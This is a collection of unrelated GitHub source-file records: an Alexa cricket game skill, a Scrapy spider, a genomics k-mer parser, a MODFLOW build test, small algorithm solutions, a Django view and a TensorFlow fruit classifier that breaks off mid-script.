unittest.main()","repo_name":"avimehenwal/python.avimehenwal","sub_path":"src/SeleniumWebDriver/selenium_with_unittest.py","file_name":"selenium_with_unittest.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1650849393","text":"import logging\nimport random\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\n#ask_sdk_core.attributes_manager.AbstractPersistenceAdapter\nsb =SkillBuilder()\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nSKILL_NAME = \"CricVerbal\"\n\ndata_out = [\n 'Bowled!','out!','L.B.W. !','Run Out!','It was a Catch!','You are Stumped!','Outzaatt!!!','Hit Wicket!',' ',]\n\ndata_six = [\n 'Boundary!','What a shot!',' ',]\n\ndata_win = [\n 'Congratulation!', 'Bravo!', 'Hurray!', 'Yippie!', ' ',]\n\n\n#expressions for winning or losing\n#six or four\n\n@sb.request_handler(can_handle_func=is_request_type(\"LaunchRequest\"))\ndef launch_request_handler(handler_input):\n\t\"\"\"Handler for Skill Launch.\"\"\"\n\t# type: (HandlerInput) -> Response\n\tspeech_text = \"Welcome to Cricverbal. You can choose to Bat or Ball first\"\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tattr[\"user_score\"]=int(0)\n\tattr[\"alexa_score\"]=int(0)\n\tattr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"PlayCricverbalIntent\"))\ndef play_request_handler(handler_input):\n\t\"\"\"Handler for Skill Launch.\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tattr[\"user_score\"]=int(0)\n\tattr[\"alexa_score\"]=int(0)\n\tattr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n\tspeech_text = \"Welcome to Cricverbal. You can choose to Bat or Ball first\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"PlayAgainIntent\"))\ndef play_again_request_handler(handler_input):\n \"\"\"Handler for Skill Launch.\"\"\"\n # type: (HandlerInput) -> Response\n attr = handler_input.attributes_manager.session_attributes\n attr[\"user_choice\"]=int(0)\n attr[\"user_score\"]=int(0)\n attr[\"alexa_score\"]=int(0)\n attr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n speech_text = \"Great! You can again choose to Bat or Ball first\"\n return handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"BatIntent\"))\ndef bat_response_handler(handler_input):\n\t\"\"\"Handler to start batting\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(1)\n\tspeech_text = \"Great Choice! You are batting now. Start saying a random number between 1 and 6\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"BallIntent\"))\ndef ball_response_handler(handler_input):\n\t\"\"\"Handler to start batting\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tspeech_text = \"Great Choice! You are balling now. Start saying a random number between 1 and 6\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"NumberIntent\"))\ndef batting_handler(handler_input):\n\t\"\"\"Handler for batting or balling\"\"\"\n\t# type: (HandlerInput) -> Response\n\trandom_out=random.choice(data_out)\n\trandom_six=random.choice(data_six)\n\trandom_win=random.choice(data_win)\n\trandom_number=int(random.randint(1,6))\n\tattr = handler_input.attributes_manager.session_attributes\n\tslots = handler_input.request_envelope.request.intent.slots\n\tnumber_user = slots[\"number\"].value\n\tattr[\"NUMBER\"] = number_user\n\tbat_or_ball=attr.get(\"user_choice\")\n\tif (int(number_user)<1 or int(number_user)>6):\n\t\tspeech_text=\"You are supposed to choose number between 1 and 6\"\n\telif (bat_or_ball==1):\n\t\tif (random_number == int(number_user)):\n\t\t\tspeech_text = random_out + \" I also threw \"+str(random_number) + \". You are out with score {} .\".format(str(attr.get(\"user_score\")))\n\t\t\tif (attr.get(\"user_state\")==0): \n\t\t\t\tattr[\"user_choice\"]=int(0)\n\t\t\t\tspeech_text+=\"Now its your turn to bowl. Start balling by saying random number between 1 and 6\"\n\t\t\t\tattr[\"user_state\"]=1\n\t\t\telse :\n\t\t\t\tif (attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\t\tspeech_text+= random_win + \" You won by \"+ str(attr.get(\"user_score\")-(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\telif (attr.get(\"user_score\")==attr.get(\"alexa_score\")):\n\t\t\t\t\tspeech_text+=\" Its a draw!\"\n\t\t\t\telse:\n\t\t\t\t\tspeech_text+=\" You lost by \"+ str(-(attr.get(\"user_score\"))+(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\tspeech_text+=\" Would you like to play again?\"\n\t\t\t\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\t\telse:\n\t\t\tif (int(number_user)==4 or int(number_user)==6):\n\t\t\t\tspeech_text = random_six + \".I threw \"+str(random_number)+\". Continue Batting... \" \n\t\t\telse :\n\t\t\t\tspeech_text = \"I threw \"+str(random_number)+\". Continue Batting...\"\n\t\t\tattr[\"user_score\"]=int(attr.get(\"user_score\"))+int(number_user)\n\t\t\tif (attr.get(\"user_state\")==1 and attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\tspeech_text=\"I threw \"+str(random_number)+\". \" + random_win + \" You won!\"\n\t\t\t\tspeech_text+=\" Would you like to play again?\" \n\n\telif(bat_or_ball==0):\t\t\t\n\t\t\tif (random_number==int(number_user)):\n\t\t\t\tspeech_text= \"Oh no! I also threw \"+str(random_number)+\". I am out with score \"+str(attr.get(\"alexa_score\"))+\" .\"\n\t\t\t\tif (attr.get(\"user_state\")==0): \n\t\t\t\t\tattr[\"user_choice\"]=int(1)\n\t\t\t\t\tspeech_text+=\" Now its your turn to bat. Start batting by saying a random number between 1 and 6.\"\n\t\t\t\t\tattr[\"user_state\"]=1\n\t\t\t\telse :\n\t\t\t\t\tif (attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\t\t\tspeech_text+= random_win+\" You won by \"+ str(attr.get(\"user_score\")-(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\t\telif (attr.get(\"user_score\")==attr.get(\"alexa_score\")):\n\t\t\t\t\t\tspeech_text+=\" Its a draw!\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tspeech_text+=\"You lost by \"+ str(-(attr.get(\"user_score\"))+(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\t\tspeech_text+=\" Would you like to play again?\"\n\t\t\t\t\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\t\t\telse:\n\t\t\t\tspeech_text=\"I scored \" + str(random_number)+\". Continue bowling...\"\n\t\t\t\tattr[\"alexa_score\"]=attr.get(\"alexa_score\")+random_number\n\t\t\t\tif (attr.get(\"user_state\")==1 and attr.get(\"user_score\") Response\n\tspeech_text=\"See you next time! Goodbye!\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(True).response\n\t\n\n\n\n\n#################################################################################\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.HelpIntent\"))\ndef help_intent_handler(handler_input):\n \"\"\"Handler for Help Intent.\"\"\"\n # type: (HandlerInput) -> Response\n speech_text = \"You can play cricket with me! The rules are simple....If you and I choose same number, the person batting is out! Otherwise, we will continue playing. Try saying play cricket.\"\n\n return handler_input.response_builder.speak(speech_text).ask(\n speech_text).set_card(SimpleCard(\n SKILL_NAME, speech_text)).response\n\n\n@sb.request_handler(\n can_handle_func=lambda handler_input:\n is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n is_intent_name(\"AMAZON.StopIntent\")(handler_input))\ndef cancel_and_stop_intent_handler(handler_input):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n # type: (HandlerInput) -> Response\n speech_text = \"Goodbye!\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(SKILL_NAME, speech_text)).response\n\n\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.FallbackIntent\"))\ndef fallback_handler(handler_input):\n \"\"\"AMAZON.FallbackIntent is only available in en-US locale.\n This handler will not be triggered except in that locale,\n so it is safe to deploy on any locale.\n \"\"\"\n # type: (HandlerInput) -> Response\n speech = (\n \"The CricVerbal skill can't help you with that. \"\n \"You can say say Bat or Ball\")\n reprompt = \"You can say Bat!!\"\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response\n\n\n@sb.request_handler(can_handle_func=is_request_type(\"SessionEndedRequest\"))\ndef session_ended_request_handler(handler_input):\n \"\"\"Handler for Session End.\"\"\"\n # type: (HandlerInput) -> Response\n return handler_input.response_builder.response\n\n\n@sb.exception_handler(can_handle_func=lambda i, e: True)\ndef all_exception_handler(handler_input, exception):\n \"\"\"Catch all exception handler, log exception and\n respond with custom message.\n \"\"\"\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, there was some problem. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response\n\n\nlambda_handler = sb.lambda_handler()\n","repo_name":"sundeshgupta/alexa-skill","sub_path":"lambda/py/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":10045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30476179378","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom scralab.items import ScralabItem\n\nclass Labspd1Spider(scrapy.Spider):\n name = 'labspd1'\n allowed_domains = ['lab.scrapyd.cn']\n start_urls = ['http://lab.scrapyd.cn/']\n\n def parse(self, response):\n\n quote = response.css(\"div.quote\")\n\n item =ScralabItem()\n\n for i in quote:\n item['cont'] = i.css(\".text::text\").extract_first()\n tags = i.css(\".tags .tag::text\").extract()\n\n item['tag'] = \",\".join(tags)\n\n yield item\n\n next_page = response.css(\"li.next a::attr(href)\").extract_first()\n if next_page is not None:\n next_page = response.urljoin(next_page)\n yield scrapy.Request(next_page, callback=self.parse)\n","repo_name":"1AKO1/2020shixun","sub_path":"other/Tesla/ScrapyPro/scralab/scralab/spiders/labspd1.py","file_name":"labspd1.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27118693387","text":"# -*- coding=utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport pysam as ps\nfrom random import sample\n\nsamfile = ps.AlignmentFile('data/nanopore_sorted.bam','rb')\n\nstart = 0\nend = start + 1000\nk = 12\nprint('k =', k)\n\nkmers = {} \nindex_rows = []\nmetadata = {}\nfor read in samfile.fetch('NC_000913.3', start, end):\n read_sequence = read.query_sequence\n read_id = read.query_name\n index_rows = index_rows + [read_id]\n algn_start = read.query_alignment_start\n if read_sequence is not None:\n for i in range(len(read_sequence) - k + 1):\n kmer = read_sequence[i: i+k]\n current_pos = algn_start+i\n if kmer in metadata:\n # get the kmer's last appearance position\n latest_pos = metadata[kmer][-1]\n #update metadata\n #the smaller the distance between repeating kmers\n #the fewer informative positions we have\n if current_pos - latest_pos > 500:\n # significant gap between duplicate kmer\n # create new kmer (crude threshold)\n kmers[f'{kmer}_{current_pos}'] = {read_id}\n metadata[kmer] = np.append(metadata[kmer],[current_pos])\n else:\n #get the nearest pos\n idx = (np.abs(metadata[kmer]-current_pos)).argmin()\n kmers[f'{kmer}_{metadata[kmer][idx]}'].add(read_id)\n else:\n #create a tuple of metadata and set of reads\n kmers[f'{kmer}_{current_pos}'] = {read_id}\n metadata[kmer] = np.array([current_pos])\n\nprint('Total number of read sequence in range:', len(index_rows))\nprint('Total number of kmer:', len(kmers))\nprint('Total number of kmer (without repeating):', len(metadata))\n\n# look for suspicious position\nprint('Identify suspicious position...')\nsus = [key for key, value in kmers.items() if len(value)>=(len(index_rows)/3)]\nprint('Number of informative position:', len(sus))\n\nmatrix = pd.DataFrame([],index = index_rows, columns= sus)\nprint('Generating matrix...')\nfor key in sus:\n matrix.loc[list(kmers[key]),[key]] = 1\n\n#fill empty positions with 0\nmatrix = matrix.fillna(0)\n\nprint('Exporting to csv...')\nprint('Dimension of matrix:', matrix.shape)\nmatrix.to_csv('data/kmers_problem.csv')","repo_name":"tmtktmtk/haploytyping_mip_gurobi","sub_path":"parser_kmers.py","file_name":"parser_kmers.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36747013078","text":"import contextlib\nimport os\nimport shutil\nimport sys\nimport time\n\nimport flopy\nimport pytest\n\nimport pymake\n\n# define program data\ntarget = \"mf6\"\nif sys.platform.lower() == \"win32\":\n target += \".exe\"\n\nsharedobject_target = \"libmf6\"\nif sys.platform.lower() == \"win32\":\n sharedobject_target += \".dll\"\nelif sys.platform.lower() == \"darwin\":\n sharedobject_target += \".dylib\"\nelse:\n sharedobject_target += \".so\"\n\n# get program dictionary\nprog_dict = pymake.usgs_program_data.get_target(target)\n\n# set up paths\ndstpth = os.path.join(f\"temp_{os.path.basename(__file__).replace('.py', '')}\")\nif not os.path.exists(dstpth):\n os.makedirs(dstpth, exist_ok=True)\n\nmf6ver = prog_dict.version\nmf6pth = os.path.join(dstpth, prog_dict.dirname)\nepth = os.path.join(dstpth, target)\n\n# set fpth based on current path\nif os.path.basename(os.path.normpath(os.getcwd())) == \"autotest\":\n fpth = os.path.abspath(\n os.path.join(\"temp\", \"mf6examples\", \"mf6examples.txt\")\n )\nelse:\n fpth = os.path.abspath(\n os.path.join(\"autotest\", \"temp\", \"mf6examples\", \"mf6examples.txt\")\n )\nif os.path.isfile(fpth):\n with open(fpth) as f:\n lines = f.read().splitlines()\n sim_dirs = [line for line in lines if len(line) > 0]\nelse:\n sim_dirs = []\n\npm = pymake.Pymake(verbose=True)\npm.target = target\npm.appdir = dstpth\npm.makefile = True\npm.makeclean = True\npm.makefiledir = dstpth\npm.inplace = True\npm.networkx = True\n\n\n@contextlib.contextmanager\ndef working_directory(path):\n \"\"\"Changes working directory and returns to previous on exit.\"\"\"\n prev_cwd = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(prev_cwd)\n\n\ndef build_with_makefile(makefile_target):\n success = False\n with working_directory(dstpth):\n if os.path.isfile(\"makefile\"):\n # wait to delete on windows\n if sys.platform.lower() == \"win32\":\n time.sleep(6)\n\n # clean prior to make\n print(f\"clean {makefile_target} with makefile\")\n os.system(\"make clean\")\n\n # build MODFLOW 6 with makefile\n print(f\"build {makefile_target} with makefile\")\n return_code = os.system(\"make\")\n\n # test if running on Windows with ifort, if True the makefile\n # should fail\n if sys.platform.lower() == \"win32\" and pm.fc == \"ifort\":\n if return_code != 0:\n success = True\n else:\n success = False\n # verify that target was made\n else:\n success = os.path.isfile(makefile_target)\n\n return success\n\n\ndef clean_up():\n # clean up makefile\n print(\"Removing makefile\")\n files = [\n os.path.join(dstpth, file_name)\n for file_name in (\"makefile\", \"makedefaults\")\n ]\n for fpth in files:\n if os.path.isfile(fpth):\n os.remove(fpth)\n\n # finalize pymake object\n pm.finalize()\n\n if os.path.isfile(epth):\n print(\"Removing \" + target)\n os.remove(epth)\n\n print(\"Removing temporary build directories\")\n dirs_temp = [dstpth]\n for d in dirs_temp:\n if os.path.isdir(d):\n shutil.rmtree(d)\n return\n\n\ndef run_mf6(ws):\n success = False\n exe_name = os.path.abspath(epth)\n if os.path.exists(exe_name):\n # run test models\n print(f\"running model...{os.path.basename(ws)}\")\n success, buff = flopy.run_model(\n exe_name, None, model_ws=ws, silent=False\n )\n return success\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_download():\n # Remove the existing mf6 directory if it exists\n if os.path.isdir(mf6pth):\n shutil.rmtree(mf6pth)\n\n # download the modflow 6 release\n pm.download_target(target, download_path=dstpth)\n assert pm.download, f\"could not download {target} distribution\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_compile():\n assert pm.build() == 0, f\"could not compile {target}\"\n\n\n@pytest.mark.regression\n@pytest.mark.parametrize(\"ws\", sim_dirs)\ndef test_mf6(ws):\n assert run_mf6(ws), f\"could not run {ws}\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_makefile():\n assert build_with_makefile(\n target\n ), f\"could not compile {target} with makefile\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_sharedobject():\n pm.target = sharedobject_target\n prog_dict = pymake.usgs_program_data.get_target(pm.target)\n pm.appdir = dstpth\n pm.srcdir = os.path.join(mf6pth, prog_dict.srcdir)\n pm.srcdir2 = os.path.join(mf6pth, \"src\")\n pm.excludefiles = [os.path.join(pm.srcdir2, \"mf6.f90\")]\n pm.makefile = True\n pm.makeclean = True\n pm.sharedobject = True\n pm.inplace = True\n pm.dryrun = False\n assert pm.build() == 0, f\"could not compile {pm.target}\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_sharedobject_makefile():\n assert build_with_makefile(\n sharedobject_target\n ), f\"could not compile {sharedobject_target} with makefile\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_clean_up():\n clean_up()\n\n\nif __name__ == \"__main__\":\n test_download()\n test_compile()\n for ws in sim_dirs:\n run_mf6(ws)\n test_makefile()\n test_sharedobject()\n test_sharedobject_makefile()\n test_clean_up()\n","repo_name":"1Keanu/pymake","sub_path":"autotest/t008_test.py","file_name":"t008_test.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"15747312934","text":"'''\nMerge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.\n\nExample:\n\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n'''\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head = tail = next_node = None\n while l1 or l2:\n if not l1 or (l2 and l1.val >= l2.val):\n next_node = l2\n l2 = l2.next\n else:\n next_node = l1\n l1 = l1.next\n if not tail:\n head = tail = next_node\n else:\n tail.next = next_node\n tail = tail.next\n if tail:\n tail.next = None\n return head\n","repo_name":"kias-git/coding-practice","sub_path":"leetcode/algorithms/merge-two-sorted-lists.py","file_name":"merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22017901941","text":"# 정답\n\nfrom collections import deque\nfrom copy import deepcopy\n\nN, M = map(int, input().split(' '))\nHx, Hy = map(int, input().split(' '))\nEx, Ey = map(int, input().split(' '))\narr = [list(map(int, input().split(' '))) for _ in range(N)]\ndist = [[[-1, -1] for _ in range(M)] for _ in range(N)]\n\nq = deque([[Hx - 1, Hy - 1, 0]])\ndist[Hx - 1][Hy - 1][0] = 0\nanswer = 0\nwhile q:\n x, y, z = q.popleft()\n if x == Ex - 1 and y == Ey - 1:\n answer = dist[x][y][z]\n break\n\n for dx, dy in (1, 0), (-1, 0), (0, 1), (0, -1):\n nx, ny, nz = x + dx, y + dy, z\n if nx < 0 or nx >= N or ny < 0 or ny >= M:\n continue\n if arr[nx][ny]:\n if nz:\n continue\n else:\n nz = 1\n if dist[nx][ny][nz] == -1:\n dist[nx][ny][nz] = dist[x][y][z] + 1\n q.append([nx, ny, nz])\nif not answer:\n print(-1)\nelse:\n print(answer)\n","repo_name":"wjk1011/BasicToAdvanced","sub_path":"Baekjoon/DFS_BFS/미로탈출_이찬규.py","file_name":"미로탈출_이찬규.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23550282108","text":"#Tae Young Kevin Shin\r\n#11-22-2016 Comsc 235B\r\n#Dr. Christ / Chaning color image to grayscale image\r\n\r\n#import graphics\r\nfrom graphics import*\r\n\r\n\r\n#Defining main function\r\ndef main():\r\n\r\n #Drawing / Pulling up given picture on graphic window\r\n win = GraphWin(\"Grayscale\",600,600)\r\n image = Image(Point(300,300), \"pikachu.gif\")\r\n image.draw(win)\r\n\r\n row = 0\r\n column = 0\r\n\r\n win.getMouse()\r\n\r\n #Starting for-loop of row and column consecutively\r\n for row in range(image.getWidth()):\r\n for column in range(image.getHeight()):\r\n r, g, b = image.getPixel(row, column)\r\n brightness = int(round(0.299 * r + 0.587 * g + 0.114 * b))\r\n image.setPixel(row, column, color_rgb(brightness, brightness, brightness))\r\n win.update()\r\n\r\n\r\n #Closing the window after one-more mouse click\r\n win.getMouse()\r\n win.close()\r\n\r\nmain()\r\n\r\n","repo_name":"Python-Shin-AOCG/Programming-and-Problem-Solving","sub_path":"grayscale.py","file_name":"grayscale.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4986126642","text":"'''\nCreated on Feb 20, 2013\n\n@author: mkiyer\n'''\nimport unittest\n\nfrom assemblyline.lib.transcript import POS_STRAND, NEG_STRAND, Exon\nfrom assemblyline.lib.assemble.transcript_graph2 import create_transcript_graphs\nfrom assemblyline.lib.assemble.assembler import assemble_transcript_graph\n\nfrom test_base import read_first_locus\n\nclass TestAssembler(unittest.TestCase):\n\n def test_assembler1(self):\n # setup correct transcripts\n PATH_ABCDE = tuple([Exon(0,100), Exon(200,300), Exon(400,500),Exon(600,700), Exon(800,900)])\n PATH_ACE = tuple([Exon(0,100), Exon(400,500), Exon(800,900)])\n PATH_ABCE = tuple([Exon(0,100), Exon(200,300), Exon(400,500), Exon(800,900)])\n PATH_ACDE = tuple([Exon(0,100), Exon(400,500),Exon(600,700), Exon(800,900)])\n # read transcripts\n transcripts = read_first_locus(\"assemble1.gtf\", score_attr=\"score\")\n tdict = dict((t.attrs['transcript_id'],t) for t in transcripts)\n # set transcript scores\n tdict[\"ABCDE\"].score = 2.0\n tdict[\"ACE\"].score = 1.0\n tdict[\"ABCE\"].score = 1.0\n tdict[\"ACDE\"].score = 1.0\n # create graphs\n GS = create_transcript_graphs('chr1', transcripts, \n create_bedgraph=False, \n bedgraph_filehs=None,\n min_trim_length=0, \n trim_utr_fraction=0.0,\n trim_intron_fraction=0.0) \n Gsub, strand, partial_paths = GS[0].Gsub, GS[0].strand, GS[0].partial_paths\n # assemble with kmax=2\n results = list(assemble_transcript_graph(Gsub, strand, partial_paths,\n user_kmax=2,\n ksensitivity=0,\n fraction_major_path=0,\n max_paths=1000))\n self.assertEquals(len(results), 2)\n self.assertEqual(tuple(results[0].path), PATH_ABCDE) \n self.assertAlmostEqual(results[0].score, 3.0, places=3) \n self.assertEqual(tuple(results[1].path), PATH_ACE) \n self.assertAlmostEqual(results[1].score, 2.0, places=3) \n # change transcript scores\n tdict[\"ABCDE\"].score = 4.0\n tdict[\"ACE\"].score = 3.0\n tdict[\"ABCE\"].score = 2.0\n tdict[\"ACDE\"].score = 1.0\n # create graphs\n GS = create_transcript_graphs('chr1', transcripts, \n create_bedgraph=False, \n bedgraph_filehs=None,\n min_trim_length=0, \n trim_utr_fraction=0.0,\n trim_intron_fraction=0.0) \n Gsub, strand, partial_paths = GS[0].Gsub, GS[0].strand, GS[0].partial_paths\n # assemble with kmax=3\n results = list(assemble_transcript_graph(Gsub, strand, partial_paths,\n user_kmax=3,\n ksensitivity=0,\n fraction_major_path=0,\n max_paths=1000))\n self.assertEquals(len(results), 4)\n self.assertEqual(tuple(results[0].path), PATH_ABCDE) \n self.assertAlmostEqual(results[0].score, 4.0, places=3) \n self.assertEqual(tuple(results[1].path), PATH_ACE) \n self.assertAlmostEqual(results[1].score, 3.0, places=3) \n self.assertEqual(tuple(results[2].path), PATH_ABCE) \n self.assertAlmostEqual(results[2].score, 2.0, places=3) \n self.assertEqual(tuple(results[3].path), PATH_ACDE) \n self.assertAlmostEqual(results[3].score, 1.0, places=3) \n return\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"bmpvieira-forks/assemblyline","sub_path":"assemblyline/assemblyline/test/test_assembler2.py","file_name":"test_assembler2.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"29800141875","text":"from django.shortcuts import render,redirect\nfrom .forms import ContactForm\n\n\n\ndef home(request):\n if request.method == 'POST':\n f = ContactForm(request.POST)\n if f.is_valid():\n f.save()\n return redirect('HomePage')\n else:\n f = ContactForm()\n return render(request, 'base/index.html', {'form': f})\n\n","repo_name":"Winternight9/django-portfolio","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32337890717","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nfrom PIL import Image\nimport pathlib\nimport tensorflow as tf\nfrom tensorflow import keras\nimport cv2\nimport imghdr\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\n\ndata_dir = 'data'\ndata_dir =pathlib.Path(data_dir)\n\nimage_count = len(list(data_dir.glob('*/*.jpg')))\nprint(image_count)\n\n## Open the Image\napple = list(data_dir.glob('apple/*'))\n# app = Image.open(str(apple[0]))\nbanana = list(data_dir.glob('banana/*'))\n# bana = Image.open(str(banana[0]))\norange = list(data_dir.glob('orange/*'))\n# ora = Image.open(str(orange[0]))\n\"\"\" plt.imshow(app, cmap='gray')\nplt.show()\nplt.imshow(bana, cmap='gray')\nplt.show()\nplt.imshow(ora, cmap='gray')\nplt.show() \"\"\"\n\nbatch_size = 68\nimg_height = 190\nimg_width = 190\n\n# Found 733 files belonging to 3 classes.\n# Using 587 files for training.\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n subset=\"training\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size) \n\n\n# Found 733 files belonging to 3 classes.\n# Using 146 files for validation.\n\nval_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n subset=\"validation\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n\nclass_names = train_ds.class_names\nprint(class_names) # apple, banana, orange\n\n\n# Visualize the Picture\n# plt.figure(figsize=(10, 10))\n# for images, labels in train_ds.take(1):\n# for i in range(9):\n# ax = plt.subplot(3, 3, i + 1)\n# plt.imshow(images[i].numpy().astype(\"uint8\"))\n# plt.title(class_names[labels[i]])\n# plt.axis(\"off\")\n\nfor image_batch, labels_batch in train_ds:\n print(image_batch.shape)\n print(labels_batch.shape)\n break\n\n\n# Configure the dataset for performance\n\nAUTOTUNE = tf.data.AUTOTUNE\n\ntrain_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\nval_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n\n#Standardize the data\nnormalization_layer = layers.Rescaling(1./255)\n\nnormalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\nimage_batch, labels_batch = next(iter(normalized_ds))\nfirst_image = image_batch[0]\n# Notice the pixel values are now in `[0,1]`.\nprint(np.min(first_image), np.max(first_image))\n\nnum_classes = len(class_names)\nmodel = Sequential([\n layers.Rescaling(1./255, input_shape=(img_height, img_width, 3)),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(64, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes)\n])\n\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nepochs=10\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs\n)\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 